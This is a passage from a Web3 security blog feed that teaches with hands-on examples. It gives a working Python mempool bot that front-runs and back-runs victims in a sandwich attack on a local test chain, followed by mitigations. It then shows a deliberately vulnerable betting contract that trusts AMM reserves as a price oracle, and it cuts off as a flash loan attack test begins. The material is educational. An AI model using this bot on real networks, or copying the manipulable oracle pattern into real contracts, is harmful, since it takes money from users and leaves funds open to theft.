                        no_attack_profit = (args[&quot;amount&quot;] * potion_price) - (args[&quot;amount&quot;] * potion_price)

                        # Execute front-running
                        print(&quot;Executing Front-Run...&quot;)
                        gas_price = int(web3.eth.gas_price * GAS_PRICE_MULTIPLIER)
                        value = int((args[&quot;amount&quot;] + 5) * potion_price)  # Total cost calculation
                        print(f&quot;Value to send in Front-Run (Wei): {value}&quot;)

                        front_run_signed = build_signed_tx(
                            potion_contract.functions.buyPotions(args[&quot;amount&quot;] + 5),
                            gas_price,
                            value=value
                        )
                        send_tx(front_run_signed)
                        print(&quot;Front-Run completed.&quot;)

                        # Wait for the victim&apos;s transaction to confirm
                        print(&quot;Waiting for the victim&apos;s transaction to confirm...&quot;)
                        while web3.eth.get_transaction_receipt(tx_hash) is None:
                            time.sleep(1)

                        # Execute back-running
                        print(&quot;Executing Back-Run...&quot;)
                        back_run_signed = build_signed_tx(
                            potion_contract.functions.sellPotions(args[&quot;amount&quot;] + 5),
                            gas_price,
                            value=0  # No ETH sent during sell
                        )
                        send_tx(back_run_signed)
                        print(&quot;Back-Run completed. Sandwich Attack successful.&quot;)

                        # Calculate and display profits
                        final_balance = web3.eth.get_balance(ATTACKER[&quot;address&quot;])
                        attack_profit = web3.from_wei(final_balance - initial_balance, &quot;ether&quot;)
                        no_attack_profit_eth = web3.from_wei(no_attack_profit, &quot;ether&quot;)

                        # Display the results
                        print(&quot;\n=== Sandwich Attack Summary ===&quot;)
                        print(f&quot;Profit WITHOUT attack: {no_attack_profit_eth:.4f} ETH&quot;)
                        print(f&quot;Profit WITH attack: {attack_profit:.4f} ETH&quot;)
                        print(f&quot;Total Sandwich Attack Profit: {attack_profit - no_attack_profit_eth:.4f} ETH&quot;)
                        return  # Exit the loop after a successful attack

        except Exception as e:
            print(f&quot;Error: {e}&quot;)
        time.sleep(1)

# %% Cell 5
# Run the bot
if __name__ == &quot;__main__&quot;:
    try:
        monitor_mempool_and_attack()
    except KeyboardInterrupt:
        print(&quot;Bot stopped manually.&quot;)


```
&lt;/details&gt;


This bot will monitor the blockchain for pending transactions, execute a front-running transaction to profit from the price increase, and follow it up with a back-running transaction to sell at the inflated price.

```python
# %% Cell 1
from web3 import Web3
import time
import json

# Connect to the local blockchain network
ganache_url = &quot;http://127.0.0.1:8545&quot;  # Local Anvil node
web3 = Web3(Web3.HTTPProvider(ganache_url))

# Check if the connection is successful
if not web3.is_connected():
    print(&quot;Error: Could not connect to the network.&quot;)
else:
    print(&quot;Connection to the local network established.&quot;)

```

The bot starts by connecting to the local blockchain network using `web3.py`. It verifies the connection to ensure the script can interact with the blockchain.

```python
# %% Cell 2
# Load the contract and attacker configuration
CONTRACT_ADDRESS = &quot;0xB7f8BC63BbcaD18155201308C8f3540b07f84F5e&quot;  # Replace with the deployed contract address
with open(&quot;./out/MagicPotionMarket.sol/MagicPotionMarket.json&quot;) as f:
    contract_json = json.load(f)
    CONTRACT_ABI = contract_json[&quot;abi&quot;]

potion_contract = web3.eth.contract(address=CONTRACT_ADDRESS, abi=CONTRACT_ABI)

# Attacker details
ATTACKER = {
    &quot;address&quot;: &quot;0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC&quot;,  # Attacker&apos;s address
    &quot;private_key&quot;: &quot;0x5de4111afa1a4b94908f83103eb1f1706367c2e68ca870fc3fb9a804cdab365a&quot;  # Attacker&apos;s private key
}

# Set the parameters for the attack
GAS_PRICE_MULTIPLIER = 1.5  # Gas price multiplier for front-running
POTION_THRESHOLD = 5        # Minimum potions for a transaction to be interesting

print(&quot;Contract initialized and attacker configured.&quot;)

```

The script loads the ABI and deployed contract address to interact with the `MagicPotionMarket` contract. The attacker’s wallet address and private key are also defined here, as well as the attack parameters, such as the gas price multiplier and potion threshold.

```python
# %% Cell 3
# Helper functions for transactions
def build_signed_tx(function_call, gas_price, value=0):
    &quot;&quot;&quot;
    Build and sign a transaction.
    &quot;&quot;&quot;
    tx = function_call.build_transaction({
        &apos;from&apos;: ATTACKER[&quot;address&quot;],
        &apos;gas&apos;: 2000000,
        &apos;gasPrice&apos;: gas_price,
        &apos;nonce&apos;: web3.eth.get_transaction_count(ATTACKER[&quot;address&quot;]),
        &apos;value&apos;: int(value)  # Ensure the value is an integer
    })
    signed_tx = web3.eth.account.sign_transaction(tx, ATTACKER[&quot;private_key&quot;])
    return signed_tx

def send_tx(signed_tx):
    &quot;&quot;&quot;
    Send a signed transaction and wait for its receipt.
    &quot;&quot;&quot;
    tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
    receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
    return receipt

```

These helper functions simplify the process of creating, signing, and sending transactions. `build_signed_tx` prepares a transaction for functions like `buyPotions` or `sellPotions`, while `send_tx` sends the signed transaction and waits for confirmation.

```python
# %% Cell 4
# Monitor the mempool and execute the Sandwich Attack
def monitor_mempool_and_attack():
    print(&quot;Monitoring the mempool for interesting transactions...&quot;)
    pending_filter = web3.eth.filter(&quot;pending&quot;)

    # Track the attacker&apos;s initial balance
    initial_balance = web3.eth.get_balance(ATTACKER[&quot;address&quot;])

    while True:
        try:
            pending_txs = pending_filter.get_new_entries()
            for tx_hash in pending_txs:
                tx = web3.eth.get_transaction(tx_hash)

                # Skip transactions from the attacker
                if tx[&quot;from&quot;].lower() == ATTACKER[&quot;address&quot;].lower():
                    continue

                # Check if the transaction interacts with the target contract
                if tx[&quot;to&quot;] == CONTRACT_ADDRESS:
                    decoded_input = potion_contract.decode_function_input(tx[&quot;input&quot;])
                    function_name = decoded_input[0].fn_name
                    args = decoded_input[1]

                    if function_name == &quot;buyPotions&quot; and args[&quot;amount&quot;] &gt;= POTION_THRESHOLD:
                        print(f&quot;Interesting transaction detected: {tx_hash.hex()} | {args[&apos;amount&apos;]} potions&quot;)

                        # Fetch the current potion price
                        potion_price = potion_contract.functions.potionPrice().call()
                        print(f&quot;Current potion price (Wei): {potion_price}&quot;)

                        # Execute front-running
                        print(&quot;Executing Front-Run...&quot;)
                        gas_price = int(web3.eth.gas_price * GAS_PRICE_MULTIPLIER)
                        value = int((args[&quot;amount&quot;] + 5) * potion_price)
                        front_run_signed = build_signed_tx(
                            potion_contract.functions.buyPotions(args[&quot;amount&quot;] + 5),
                            gas_price,
                            value=value
                        )
                        send_tx(front_run_signed)
                        print(&quot;Front-Run completed.&quot;)

                        # Wait for the victim&apos;s transaction to confirm
                        print(&quot;Waiting for the victim&apos;s transaction to confirm...&quot;)
                        while web3.eth.get_transaction_receipt(tx_hash) is None:
                            time.sleep(1)

                        # Execute back-running
                        print(&quot;Executing Back-Run...&quot;)
                        back_run_signed = build_signed_tx(
                            potion_contract.functions.sellPotions(args[&quot;amount&quot;] + 5),
                            gas_price
                        )
                        send_tx(back_run_signed)
                        print(&quot;Back-Run completed. Sandwich Attack successful.&quot;)

                        # Calculate and display profits
                        final_balance = web3.eth.get_balance(ATTACKER[&quot;address&quot;])
                        attack_profit = web3.from_wei(final_balance - initial_balance, &quot;ether&quot;)
                        print(f&quot;Profit from Sandwich Attack: {attack_profit:.4f} ETH&quot;)
                        return  # Exit after a successful attack

        except Exception as e:
            print(f&quot;Error: {e}&quot;)
        time.sleep(1)

```

The bot continuously monitors the mempool for transactions involving the `buyPotions` function of the vulnerable contract. When it detects a qualifying transaction:

-   It performs a **front-run** by buying additional potions before the victim’s transaction.
-   After the victim’s transaction completes, it executes a **back-run** to sell the potions at the inflated price.

Finally, it calculates the profit from the attack and displays it.

# The Sandwich Attack in Action

Now that we’ve explored the contract vulnerabilities, set up our validator, and simulated both the victim’s and attacker’s transactions, it’s time to tie everything together. The goal of this section is to walk you through the process step-by-step, showing how the pieces fit and explaining the final results of the Sandwich Attack. By the end, you’ll have a clear understanding of how an attacker profits from manipulating the mempool and price mechanics.

**Setting Up the Network**

![](/content/images/2024/12/image-7.png)

Anvil set up

We start by initializing Anvil, Foundry’s blockchain simulation tool, configured with a custom block time of 20 seconds. This delay between blocks gives our validator enough time to monitor transactions in the mempool and execute the necessary front-running and back-running operations.

**Configuring the Validator**

![](/content/images/2024/12/image-8.png)

Validator Running Output

Next, we execute the validator using **nodemon**, which continuously runs our script and restarts it automatically when changes are detected. This setup ensures a seamless monitoring experience, allowing the validator to stay active and responsive to pending transactions in the mempool.

**Deploying the Contract and Simulating the Victim**

With the network and validator ready, we utilize the deployment script previously discussed to deploy the **MagicPotionMarket** contract. This script handles everything from compiling the contract to deploying it and saving its address for later use.

![](/content/images/2024/12/image-15.png)

Contract deployed

Once the contract is deployed successfully, we proceed to simulate the victim’s transaction. In this scenario, the victim attempts to purchase 10 potions, with the initial price set at **1 ETH per potion**.

The victim’s purchase triggers an increase in the potion price, calculated as:

$$\text{Price Increase} = \text{Amount Bought by Victim} \times 0.01 \, \text{ETH} $$

$$\text{Price Increase} = 10 \times 0.01 = 0.1 \, \text{ETH}$$

This dynamic pricing mechanism plays a crucial role in the profitability of the attack.

![](/content/images/2024/12/image-16.png)

Victim&apos;s Transaction Output

**The Attack in Action**

Once the validator detects the victim’s transaction in the mempool, the bot initiates the Sandwich Attack. The bot executes a **front-run**, buying **15 potions** before the victim. This front-run causes the potion price to rise by:

$$\text{Price Increase from Front-Run} = \text{Amount Bought by Attacker} \times 0.01 \, \text{ETH} $$

$$\text{Price Increase from Front-Run} = 15 \times 0.01 = 0.15 \, \text{ETH} $$

After the victim’s transaction is mined, the price rises further. Finally, the bot performs a **back-run**, selling its **15 potions** at the new inflated price.

![](/content/images/2024/12/image-17.png)

Bot Output with Sandwich Attack Results

The results of the attack are summarized by the bot. Without the attack, the attacker’s profit would have been zero. However, by leveraging the Sandwich Attack strategy, the bot calculates a total profit of **3.7499 ETH**.

This profit is derived from the manipulation of the potion price through the front-running and back-running transactions. At a high level:

1.  **Front-Run Cost**: The bot buys **15 potions** at the initial price of **1 ETH** each, totaling **15 ETH**.
2.  **Back-Run Revenue**: The bot sells these potions at the final inflated price after the victim’s transaction. With each potion increasing in price due to the victim and the attacker’s transactions, the bot sells at a significantly higher value, resulting in the profit.

The calculated profit of **3.7499 ETH** reflects the effectiveness of the Sandwich Attack strategy in exploiting pricing dynamics.

# Top Three Recommendations to Mitigate Sandwich Attacks

To address the vulnerabilities that enable Sandwich Attacks, we can apply some practical improvements to the **MagicPotionMarket** contract. These solutions aim to balance security and usability while making the contract much harder to exploit. Let’s explore these approaches and their implementation in a conversational manner.

## **Slippage Protection**

A common way to prevent sandwich attacks is by giving users control over the maximum price they are willing to pay for potions. This ensures that if an attacker manipulates the price during the transaction, it simply reverts.

Here’s how we can do it:

```solidity
function buyPotions(uint256 amount, uint256 maxPrice) external payable {
    require(potionPrice &lt;= maxPrice, &quot;Potion price exceeds slippage tolerance&quot;);
    require(msg.value == amount * potionPrice, &quot;Incorrect ETH value sent&quot;);

    potionBalances[msg.sender] += amount;

    // Increment potion price based on demand
    potionPrice += (amount * 1 ether) / 100;
    require(potionPrice &gt; 0, &quot;Potion price overflow&quot;);

    emit PotionsBought(msg.sender, amount, potionPrice);
}

```

**How does it work?**  
We added a `maxPrice` parameter. This acts as a safeguard for buyers, making sure their transaction only goes through if the potion price hasn’t increased beyond what they’re willing to pay. So, if an attacker tries to front-run, the transaction fails automatically if the price jumps too high.

&lt;details&gt;
&lt;summary&gt;Imagine submitting this transaction:&lt;/summary&gt;

```solidity
buyPotions(10, 1.1 ether); // Only processes if potionPrice ≤ 1.1 ETH

```
&lt;/details&gt;


If the price suddenly spikes above `1.1 ether`, the transaction reverts. Simple, but effective!

## **Private Transactions**

Another powerful defense is to make transactions invisible to attackers by using private relayers, such as Flashbots. These tools bypass the public mempool entirely, so malicious actors can’t even see the transaction.

Here’s how we can integrate this concept:

```solidity
mapping(address =&gt; bool) privateRelayer;

modifier onlyPrivateRelayer() {
    require(privateRelayer[msg.sender], &quot;Must send via private relayer&quot;);
    _;
}

function buyPotionsPrivate(uint256 amount) external payable onlyPrivateRelayer {
    require(msg.value == amount * potionPrice, &quot;Incorrect ETH value sent&quot;);

    potionBalances[msg.sender] += amount;

    // Adjust potion price
    potionPrice += (amount * 1 ether) / 100;
    require(potionPrice &gt; 0, &quot;Potion price overflow&quot;);

    emit PotionsBought(msg.sender, amount, potionPrice);
}

function addPrivateRelayer(address relayer) external onlyOwner {
    privateRelayer[relayer] = true;
}

```

**How does it work?**  
Transactions can only come from addresses you’ve added to a whitelist (like trusted private relayers). Attackers can’t front-run what they can’t see. This is particularly effective if buyers are willing to use tools like Flashbots to interact with the contract.

&lt;details&gt;
&lt;summary&gt;Example:&lt;/summary&gt;

```solidity
addPrivateRelayer(flashbotsAddress);

```
&lt;/details&gt;


## **Dynamic Pricing**

Finally, adding unpredictability to potion price updates can throw attackers off. If the price adjustment isn’t deterministic, they can’t predict what will happen during their front-run.

Here’s an example:

```solidity
function buyPotions(uint256 amount) external payable {
    require(msg.value == amount * potionPrice, &quot;Incorrect ETH value sent&quot;);

    potionBalances[msg.sender] += amount;

    // Dynamic pricing: Add randomness to price adjustment
    uint256 priceImpact = (amount * 1 ether) / 100;
    potionPrice += priceImpact + uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 0.01 ether;
    require(potionPrice &gt; 0, &quot;Potion price overflow&quot;);

    emit PotionsBought(msg.sender, amount, potionPrice);
}

```

**How does it work?**  
This method adds a random element using `keccak256`, which combines factors like the block timestamp and buyer address. Attackers can’t predict the potion price after a purchase, making it nearly impossible to plan a profitable sandwich attack.

# Conclusion

This chapter provided a deep dive into the intricacies of the Sandwich Attack, not just in theory but through a hands-on implementation. Along the way, we uncovered critical lessons that extend beyond the specific attack and offer broader insights into blockchain security and decentralized ecosystems:

1.  **Understanding the Attack Workflow**: By recreating the Sandwich Attack step-by-step, we gained a clear picture of how front-running and back-running work in tandem to exploit transaction ordering. This attack highlights how attackers can leverage transparency in the mempool to manipulate prices and extract profits—3.7499 ETH in our case.
2.  **Tools and Automation**: The chapter demonstrated the power of using specialized tools such as Anvil for network simulation, Cast for transaction management, and a Python bot to automate the attack process. These tools not only simplified our implementation but also revealed how accessible such attacks can be with the right setup.
3.  **Analyzing Attack Impact**: The exercise highlighted the financial impact of the Sandwich Attack, both on the attacker’s profitability and the victim’s transaction costs. This reinforces the importance of understanding these dynamics when designing smart contracts or decentralized marketplaces.
4.  **Building Security Awareness**: The most significant takeaway is the need for awareness. Understanding the mechanics of such attacks allows developers, users, and auditors to anticipate vulnerabilities and implement measures to reduce exposure, such as slippage protection, private transactions, or alternative sequencing strategies.

# References

-   **Foundry** - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
-   **Solidity** - Language for Smart Contract Development. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
-   **OpenZeppelin** - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
-   **Ethereum** - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   **Testing Ethereum Smart Contracts** - Best Practices with Foundry. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/tutorials/testing](https://book.getfoundry.sh/tutorials/testing)
-   **Mempool Mechanics** - Transaction Ordering and Vulnerabilities in Ethereum. &quot;Ethereum Documentation.&quot; Available at: https://ethereum.org/en/developers/docs/transactions/
-   **Decentralized Exchanges and Price Manipulation** - Understanding AMMs and Slippage Risks. &quot;Uniswap Documentation.&quot; Available at: [https://docs.uniswap.org/](https://docs.uniswap.org/)
-   **Gas Price Mechanics** - Optimizing Transaction Priority and Fees in Ethereum. &quot;Ethereum Documentation.&quot; Available at: [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
-   **Sandwich Attacks in DeFi** - Identifying and Mitigating Front-Running Risks. &quot;CertiK Blog.&quot; Available at: [https://www.certik.com/](https://www.certik.com/)
-   **Slippage Protection and Private Transactions** - Defending Against Sandwich Attacks in DeFi. &quot;Flashbots Documentation.&quot; Available at: https://docs.flashbots.net/</content:encoded><author>Ruben Santos</author></item><item><title>Breaking the Bet: Simulating Flash Loan Attacks in Decentralized Systems</title><link>https://www.kayssel.com/post/web3-6</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-6</guid><description>Explore how flash loan vulnerabilities impact decentralized systems through the DragonBet contract. Learn about AMMs, token pricing, and manipulation strategies. Dive into a simulated attack and discover key techniques to secure smart contracts against exploitation.</description><pubDate>Sat, 14 Dec 2024 14:33:00 GMT</pubDate><content:encoded># Introduction: Exploring Flash Loan Exploits in DeFi

In this chapter, we dive into the mechanics of flash loan vulnerabilities and how they can be exploited in decentralized systems. Using the **DragonBet** smart contract as a case study, we’ll explore how price manipulation through an Automated Market Maker (AMM) can lead to significant imbalances and unfair profits.

Prepare yourself, as this chapter leans heavily into the mathematics behind reward calculations and price manipulation. Don’t worry, though—everything will be broken down step by step to ensure clarity. Let’s unravel the exploit and see how it operates in practice!

# What is a Flash Loan Vulnerability in Web3?

In the world of Web3 and decentralized finance (DeFi), a **flash loan** is a type of uncollateralized loan that allows users to borrow assets almost instantly, as long as the loan is repaid within the same transaction. While this concept has enabled innovative financial mechanisms, it has also opened the door to a unique class of vulnerabilities.

Flash loans are powerful because they provide immense liquidity without requiring upfront collateral. However, their very nature—being instantaneous and uncollateralized—can be exploited by malicious actors. When combined with other vulnerabilities, flash loans allow attackers to manipulate smart contract logic, pricing mechanisms, or liquidity pools, resulting in significant losses for protocols and users.

#### How Does the Flash Loan Vulnerability Work?

At its core, a **flash loan vulnerability** arises when a smart contract relies on external data or processes that can be manipulated within the same transaction. Here&apos;s how an attack might unfold:

1.  **Obtain a Flash Loan**: The attacker borrows a large sum of tokens without collateral using a flash loan.
2.  **Manipulate External Dependencies**: Within the same transaction, the attacker manipulates an external data source (like a price oracle or liquidity pool). For example, they might artificially inflate or deflate the price of an asset by altering the reserves in a decentralized exchange.
3.  **Exploit the Manipulation**: Using the manipulated data, the attacker interacts with the victim smart contract. The contract, trusting the manipulated input, executes unfavorable trades, grants excessive rewards, or behaves incorrectly.
4.  **Repay the Flash Loan**: After exploiting the vulnerability, the attacker repays the loan and keeps the profit—all in one atomic transaction.

```mermaid
sequenceDiagram
    participant Attacker
    participant FlashLoanProvider as Flash Loan Provider
    participant AMM as AMM/Oracle
    participant VictimContract as Victim Smart Contract

    Attacker -&gt;&gt; FlashLoanProvider: Request flash loan
    FlashLoanProvider --&gt;&gt; Attacker: Provides flash loan
    Attacker -&gt;&gt; AMM: Manipulate price via reserves
    AMM --&gt;&gt; VictimContract: Report manipulated price
    Attacker -&gt;&gt; VictimContract: Exploit vulnerability (e.g., withdraw rewards)
    VictimContract --&gt;&gt; Attacker: Transfer inflated rewards
    Attacker -&gt;&gt; FlashLoanProvider: Repay flash loan
    Attacker --&gt;&gt; Attacker: Keep net profit

```

To truly grasp how flash loan vulnerabilities work, we’ll delve into a practical example of a vulnerable contract and a test case that illustrates the concept.

# Understanding AMMs, Tokens, and Oracles in Web3

Before diving into the details of the vulnerable `DragonBet` contract, let’s first unpack the three key concepts that form its foundation: **tokens**, **Automated Market Makers (AMMs)**, and **oracles**. These elements might sound technical, but with the help of clear and relatable analogies, they become much easier to understand.

### **Tokens: The Currency of Betting**

In the blockchain world, tokens are like digital chips that represent value or ownership. They’re the currency of decentralized systems, much like poker chips in a casino. In the `DragonBet` contract, two types of tokens are used, each serving a distinct purpose:

-   **TokenA:** Imagine this as the money you exchange at the casino’s cashier. It’s the system’s primary currency, often used in the background.
-   **TokenB:** Think of this as the actual poker chips you use at the table. You place bets using these chips in hopes of winning more.

These tokens don’t have fixed values like traditional poker chips. Instead, their exchange rate can change dynamically in response to supply and demand, which is where Automated Market Makers (AMMs) come into play.

### **Automated Market Makers (AMMs): The Decentralized Marketplace**

An Automated Market Maker (AMM), such as **Uniswap**, is like the casino’s cashier where you exchange money (TokenA) for chips (TokenB), but with a twist: the exchange rate isn’t fixed. Instead, it changes dynamically based on how much money and how many chips the cashier has left.

Imagine you walk up to the booth and find:

-   A stack of **1 dollar bills** (representing TokenA).
-   A pile of **poker chips** (representing TokenB).

If you take chips from the pile or add money to the stack, the exchange rate adjusts automatically to reflect the new balance. The fewer chips left in the pile, the more expensive they become, and vice versa. This behavior is governed by a simple rule, $x*y = k$

Where:

-   $x$ is the number of 1 dollar bills (TokenA).
-   $y$ is the number of poker chips (TokenB).
-   $k$ is a constant that keeps the system balanced.

For example, if you trade in money for chips, the pile of money grows ($x$ increases) and the pile of chips shrinks ($y$ decreases). To maintain balance, the cost of each remaining chip rises.

In the `DragonBet` contract, the AMM acts like this cashier, determining the &quot;price&quot; of chips (TokenB) based on the piles&apos; sizes. But here’s the twist: the AMM also serves as the oracle, which introduces potential risks.

### **Oracles: The Information Attendant**

Oracles act as a bridge between blockchain systems and external information. In this analogy, the oracle is like a casino attendant who tells you how much a prize costs in chips. If the attendant gives you incorrect or manipulated information, you might overpay or underpay for a prize.

In the `DragonBet` contract, the AMM acts as both the cashier and the oracle. It determines how much `TokenB` (chips) you need to claim a reward, based on its reserves. This dependency means that if someone manipulates the AMM, they can also manipulate the oracle’s price, creating a potential vulnerability.

By understanding these three concepts—tokens, AMMs, and oracles—you can see how they interact in the `DragonBet` contract. Tokens facilitate the bets, the AMM sets the prices, and the oracle blindly trusts the AMM’s data.

# Vulnerable Smart Contract: DragonBet

To understand how flash loan vulnerabilities intersect with concepts like AMMs, tokens, and oracles, we will analyze the DragonBet smart contract. This contract enables users to place bets on dragons, determining rewards based on the total bets and the exchange rates fetched from an external oracle. By relying on price data sourced from an AMM (explained in the previous section), the contract illustrates how manipulation of these inputs can expose critical vulnerabilities, making it an ideal case study.

&lt;details&gt;
&lt;summary&gt;Vulnerable Smart Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;@openzeppelin/contracts/token/ERC20/IERC20.sol&quot;;

interface IUniswapV2Pair {
    function getReserves()
        external
        view
        returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
}

contract DragonBet {
    IERC20 public tokenA; // Token para realizar apuestas
    IERC20 public tokenB; // Token usado como referencia para precios
    IUniswapV2Pair public priceOracle; // AMM usado como oráculo de precios

    struct Bet {
        address user;
        uint256 amount;
        uint256 dragonId; // ID del dragón al que apuesta
    }

    mapping(uint256 =&gt; Bet[]) public bets; // Apuestas por cada dragón
    uint256 public totalBets; // Total de tokens apostados en todas las apuestas

    constructor(address _tokenA, address _tokenB, address _priceOracle) {
        tokenA = IERC20(_tokenA);
        tokenB = IERC20(_tokenB);
        priceOracle = IUniswapV2Pair(_priceOracle);
    }

    /// Permitir a los usuarios realizar apuestas por un dragón
    function placeBet(uint256 dragonId, uint256 amount) external {
        require(amount &gt; 0, &quot;La apuesta debe ser mayor a cero&quot;);
        require(
            tokenB.transferFrom(msg.sender, address(this), amount),
            &quot;Transferencia fallida&quot;
        );

        bets[dragonId].push(
            Bet({user: msg.sender, amount: amount, dragonId: dragonId})
        );

        totalBets += amount;
    }

    function resolveBet(uint256 winningDragonId) external {
        uint256 winningPrice = getPrice(); // Fetch the manipulated price
        Bet[] memory winningBets = bets[winningDragonId];
        uint256 totalWinningBets = 0;

        // Calculate the total bets for the winning dragon
        for (uint256 i = 0; i &lt; winningBets.length; i++) {
            totalWinningBets += winningBets[i].amount;
        }

        require(totalWinningBets &gt; 0, &quot;No bets placed on the winning dragon&quot;);

        // Calculate and distribute rewards
        for (uint256 i = 0; i &lt; winningBets.length; i++) {
            uint256 reward = (winningBets[i].amount *
                totalBets *
                winningPrice) /
                totalWinningBets /
                1e18;

            // Limit rewards to the contract balance
            uint256 contractBalance = tokenB.balanceOf(address(this));
            if (reward &gt; contractBalance) {
                reward = contractBalance; // Cap the reward at the available balance
            }

            // Perform the token transfer
            require(
                tokenB.transfer(winningBets[i].user, reward),
                &quot;Transfer failed&quot;
            );
        }

        // Reset the total bets and clean up
        totalBets = 0;
        delete bets[winningDragonId];
    }

    function getPrice() public view returns (uint256) {
        (uint112 reserve0, uint112 reserve1, ) = priceOracle.getReserves();
        return (uint256(reserve1) * 1e18) / uint256(reserve0);
    }
}



```
&lt;/details&gt;


### Data Structures and State Variables

The `DragonBet` contract defines its foundational components at the start, which include the tokens for the betting process, a price oracle, and the data structures that manage user bets.

```solidity
IERC20 public tokenA; // Token used in the AMM price calculation
IERC20 public tokenB; // Token used for placing bets
IUniswapV2Pair public priceOracle; // AMM used as a price oracle

struct Bet {
    address user; // Address of the user placing the bet
    uint256 amount; // Amount of TokenB bet
    uint256 dragonId; // ID of the dragon being bet on
}

mapping(uint256 =&gt; Bet[]) public bets; // A list of bets for each dragon
uint256 public totalBets; // Total TokenB bet across all dragons

```

The contract uses two tokens, `tokenA` and `tokenB`, to operate. `TokenA` is a reference token whose price is fetched from an external AMM via the `priceOracle`. This exchange rate is used later in calculations. `TokenB`, on the other hand, is the token that bettors use to place their bets.

The `Bet` struct organizes information about each user&apos;s wager, including the bettor’s address, the amount bet, and the ID of the dragon they are betting on. These bets are stored in a mapping called `bets`, categorized by dragon ID. Additionally, the variable `totalBets` tracks the total amount of TokenB wagered across all dragons.

### Placing Bets

The `placeBet` function allows users to participate in betting by selecting a dragon and specifying the amount they wish to wager.

```solidity
function placeBet(uint256 dragonId, uint256 amount) external {
    require(amount &gt; 0, &quot;La apuesta debe ser mayor a cero&quot;);
    require(
        tokenB.transferFrom(msg.sender, address(this), amount),
        &quot;Transferencia fallida&quot;
    );

    bets[dragonId].push(
        Bet({user: msg.sender, amount: amount, dragonId: dragonId})
    );

    totalBets += amount;
}

```

A user calls this function to place a bet on a specific dragon. First, it checks that the bet amount is greater than zero. Then, it transfers the specified amount of `tokenB` from the user’s wallet to the contract using `transferFrom`. If successful, the function creates a new `Bet` struct with the user&apos;s address, bet amount, and dragon ID. This bet is stored in the appropriate array within the `bets` mapping. Finally, the total amount of bets is updated.

### Resolving Bets and Distributing Rewards

The `resolveBet` function is the heart of the contract’s payout system. Its job is to calculate and distribute rewards to players who bet on the winning dragon, relying on the current price of `TokenA` in terms of `TokenB` as provided by the `priceOracle`. This dependency becomes key to how the attacker exploits the system.

```solidity
function resolveBet(uint256 winningDragonId) external {
    uint256 winningPrice = getPrice(); // Fetch the manipulated price
    Bet[] memory winningBets = bets[winningDragonId];
    uint256 totalWinningBets = 0;

    for (uint256 i = 0; i &lt; winningBets.length; i++) {
        totalWinningBets += winningBets[i].amount;
    }

    require(totalWinningBets &gt; 0, &quot;No bets placed on the winning dragon&quot;);

    for (uint256 i = 0; i &lt; winningBets.length; i++) {
        uint256 reward = (winningBets[i].amount *
            totalBets *
            winningPrice) /
            totalWinningBets /
            1e18;

        uint256 contractBalance = tokenB.balanceOf(address(this));
        if (reward &gt; contractBalance) {
            reward = contractBalance;
        }

        require(
            tokenB.transfer(winningBets[i].user, reward),
            &quot;Transfer failed&quot;
        );
    }

    totalBets = 0;
    delete bets[winningDragonId];
}


```

First, the function retrieves the current price of `TokenA`, calculated dynamically based on the AMM reserves. The formula for the price is simple:

$$\text{Price of TokenA (winningPrice)} = \frac{\text{reserveA}}{\text{reserveB}}$$ 

With the price in hand, the function gathers all the bets placed on the winning dragon and sums them up. This total amount, called `totalWinningBets`, reflects how much was wagered on the dragon. If no bets were placed, the function stops execution with an error. However, when valid bets exist, the function proceeds to calculate each bettor’s reward.

Rewards are distributed proportionally based on how much each player bet relative to others. The formula for calculating a reward is:

$$\text{Reward} = \frac{\text{attackerBet} \cdot \text{totalBets} \cdot \text{winningPrice}}{\text{totalWinningBets}}$$

This ensures that bigger bets receive larger rewards.

Before distributing the rewards, the function includes a safeguard: rewards are capped at the contract’s current balance of `TokenB`. This prevents the contract from overpaying and ensures it remains solvent. After calculating the reward, the contract transfers the corresponding amount of `TokenB` to the bettor. If the transfer fails, the function reverts to maintain system integrity.

Finally, after distributing rewards, the contract resets its state for the next betting round. It clears all bets for the winning dragon and sets the total bets pool (`totalBets`) back to zero. This ensures the contract is ready for new wagers without leftover data from previous rounds.

### Fetching the Price from the Oracle

The `getPrice` function retrieves the current price of `tokenA` in terms of `tokenB` from the AMM.

```solidity
function getPrice() public view returns (uint256) {
    (uint112 reserve0, uint112 reserve1, ) = priceOracle.getReserves();
    return (uint256(reserve1) * 1e18) / uint256(reserve0);
}


```

This function calculates the price using the formula:

$$math \text{Price} = \frac{\text{Reserve of TokenB} \times 10^{18}}{\text{Reserve of TokenA}}$$ 

# Simulating the Attack: Exploiting the Flash Loan Vulnerability

Now that we’ve explored the vulnerable `DragonBet` contract, let’s dive into how this vulnerability can be exploited through a step-by-step test case. [Using Foundry, as we’ve done in previous chapters](https://www.kayssel.com/post/web3-4/), we’ll simulate a flash loan attack to demonstrate how the contract’s dependency on the AMM can be manipulated to an attacker’s advantage.

&lt;details&gt;
&lt;summary&gt;Code of the attack&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Test.sol&quot;;
import &quot;../src/DragonBet.sol&quot;;
import &quot;@openzeppelin/contracts/token/ERC20/ERC20.sol&quot;;

/// @notice Mock token to simulate tokenA and tokenB
contract MockToken is ERC20 {
    constructor(string memory name, string memory symbol) ERC20(name, symbol) {
        _mint(msg.sender, 1_000_000 ether); // Mint a large initial supply to the deployer
    }

    function mint(address to, uint256 amount) external {
        _mint(to, amount); // Allow minting tokens to any address
    }
}

/// @notice Mock AMM to simulate the price oracle
contract MockAMM {
    uint256 public reserveA;
